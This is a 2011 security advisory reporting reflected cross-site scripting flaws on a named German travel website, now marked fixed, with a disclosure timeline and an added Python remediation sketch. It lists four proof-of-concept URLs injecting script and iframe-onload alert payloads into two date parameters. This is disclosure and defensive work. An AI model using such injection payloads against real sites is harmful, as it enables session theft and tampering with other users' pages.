SSCHADV2011-009 - Multiple XSS vulnerabilities on http://www.netto-travel.de/
Advisory: Multiple XSS vulnerabilities on http://www.netto-travel.de/
Advisory ID: SSCHADV2011-009
Author: Stefan Schurtz
Affected Software: http://www.netto-travel.de/
Vendor URL:
Vendor Status: fixed
CVE-ID: -
======================
Vulnerability Description:
======================
The website "www.netto-travel.de" is prone to multiple XSS vulnerabilities.
==============
Technical Details:
==============
http://www.netto-travel.de/web/?abflughafen3L=-1&anzErw=1&bsd=’"<script>alert(String.fromCharCode(88,83,83))</script>&dauer=0&idreiseart=-1&ka1=1&ka2=1&ka3=1&maxDatumBis=22.08.2019&reisebudget=2&reiseziel=-1&vnd=15.08.2011
http://www.netto-travel.de/web/index.cfm?abflughafen3L=-1&anzErw=1&bsd="><iframe onload=alert(String.fromCharCode(88,83,83))>&dauer=0&idreiseart=-1&ka1=1&ka2=1&ka3=1&maxDatumBis=22.08.2019&reisebudget=2&reiseziel=-1&vnd=15.08.2011
http://www.netto-travel.de/web/?abflughafen3L=-1&anzErw=1&bsd=29.08.2011&dauer=0&idreiseart=-1&ka1=1&ka2=1&ka3=1&maxDatumBis=22.08.2019&reisebudget=2&reiseziel=-1&vnd=’"<script>alert(String.fromCharCode(88,83,83))</script>
http://www.netto-travel.de/web/index.cfm?abflughafen3L=-1&anzErw=1&bsd=29.08.2011&dauer=0&idreiseart=-1&ka1=1&ka2=1&ka3=1&maxDatumBis=22.08.2019&reisebudget=2&reiseziel=-1&vnd="><iframe onload=alert(String.fromCharCode(88,83,83))>
=====
Solution:
=====
fixed by the "Netto-Online Webteam"
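
One way to close this class of bug for the two affected parameters, as an added example that is not part of the original advisory and is not the vendor's actual fix: `bsd` and `vnd` carry dates in DD.MM.YYYY form in the URLs above, so the code parses them strictly and HTML-escapes what it writes back into the page. It is written in Python for illustration (the site itself serves `index.cfm`); the function names, the rendered form field and the sample URLs are assumptions.

```python
import html
import re
from datetime import date
from urllib.parse import parse_qs, urlsplit

# The two parameters that carried the payloads in the advisory's URLs.
DATE_PARAMS = ("bsd", "vnd")
DATE_RE = re.compile(r"([0-9]{2})\.([0-9]{2})\.([0-9]{4})")


def parse_travel_date(raw):
    """Return a date for a strict DD.MM.YYYY string, or None for anything else."""
    m = DATE_RE.fullmatch(raw)
    if m is None:
        return None
    day, month, year = (int(g) for g in m.groups())
    try:
        return date(year, month, day)
    except ValueError:  # well-formed but impossible, e.g. 31.02.2011
        return None


def clean_date_params(url):
    """Validate bsd/vnd from a request URL; invalid values become None."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    cleaned = {}
    for name in DATE_PARAMS:
        values = query.get(name, [])
        # A repeated parameter is rejected so a second copy cannot slip past.
        cleaned[name] = parse_travel_date(values[0]) if len(values) == 1 else None
    return cleaned


def render_date_input(name, value):
    """Render a form field from the parsed date, never from the raw input."""
    text = ""
    if value is not None:
        text = "{:02d}.{:02d}.{:04d}".format(value.day, value.month, value.year)
    # Escaping stays on even though the text is rebuilt: defence in depth.
    return '<input type="text" name="{}" value="{}">'.format(
        html.escape(name, quote=True), html.escape(text, quote=True)
    )


# Constructed sample requests that follow the advisory's parameter layout.
BENIGN = "http://example.invalid/web/?bsd=29.08.2011&vnd=15.08.2011&dauer=0"
HOSTILE = ("http://example.invalid/web/?bsd=%22%3E%3Ciframe%20onload"
           "%3Dalert(1)%3E&vnd=15.08.2011")
```

The same two steps (strict parsing on input, context-aware escaping on output) apply to every other parameter the page echoes, not only the two shown in the advisory.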
================
Disclosure Timeline:
================
08-Aug-2011 – informed about the contact form
08-Aug-2011 – release date of this security advisory
16-Aug-2011 – fixed by the "Netto-Online Webteam"
19-Aug-2011 – Feedback from the "Netto-Online Webteam"
====
Credits:
====
Vulnerabilities found and advisory written by Stefan Schurtz.
=======
References:
=======
http://www.netto-travel.de/